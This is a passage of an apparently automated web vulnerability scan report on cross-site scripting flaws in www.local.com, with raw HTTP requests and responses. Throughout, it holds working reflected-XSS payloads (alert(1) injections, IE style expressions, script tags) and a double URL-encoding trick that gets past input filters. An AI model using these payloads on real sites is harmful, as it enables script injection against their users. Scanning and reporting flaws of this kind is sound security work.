Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300d243c"style="x:expression(alert(1))"d187ae2a24b;ord=1296748882748?" target="_blank">
...[SNIP]...

1.467. http://www.local.com/dart/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc55'%3b14f61c68560 was submitted in the sz parameter. This input was echoed as 9fc55';14f61c68560 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x3009fc55'%3b14f61c68560&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x3009fc55';14f61c68560;ord=1296748882748?" type="text/javascript">
...[SNIP]...

1.468. http://www.local.com/dart/ [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462 was submitted in the t parameter. This input was echoed as cf3d9"style="x:expression(alert(1))"9c6370ca462 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8cf3d9"style="x:expression(alert(1))"9c6370ca462;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

1.469. http://www.local.com/dart/ [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58aaf'%3bb65e854cbc0 was submitted in the t parameter. This input was echoed as 58aaf';b65e854cbc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=858aaf'%3bb65e854cbc0&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8;tile=858aaf';b65e854cbc0;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

1.470. http://www.local.com/dart/ [zone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the zone request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b was submitted in the zone parameter. This input was echoed as fc52c';alert(1)//d85ccbd701b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100fc52c';alert(1)//d85ccbd701b;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

1.471. http://www.local.com/dart/ [zone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the zone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c was submitted in the zone parameter. This input was echoed as 15298"><script>alert(1)</script>ffbd7ca082c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_1502010015298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_1502010015298"><script>alert(1)</script>ffbd7ca082c;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...

1.472. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/music/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e7'-alert(1)-'22f4ee6710f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/music/dallas-tx.aspx?8c9e7'-alert(1)-'22f4ee6710f=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 92920
Date: Thu, 03 Feb 2011 16:51:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:57 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 92920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Concerts Events | Find
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=music&8c9e7'-alert(1)-'22f4ee6710f=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

1.473. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/performing-arts/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e4c'-alert(1)-'1c8163cafb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/performing-arts/dallas-tx.aspx?60e4c'-alert(1)-'1c8163cafb2=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 87882
Date: Thu, 03 Feb 2011 16:51:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:17 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 87882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Theatre and Comedy Eve
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=performing_arts&60e4c'-alert(1)-'1c8163cafb2=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

1.474. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/sports/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d6b'-alert(1)-'8080df3d42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/sports/dallas-tx.aspx?66d6b'-alert(1)-'8080df3d42=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
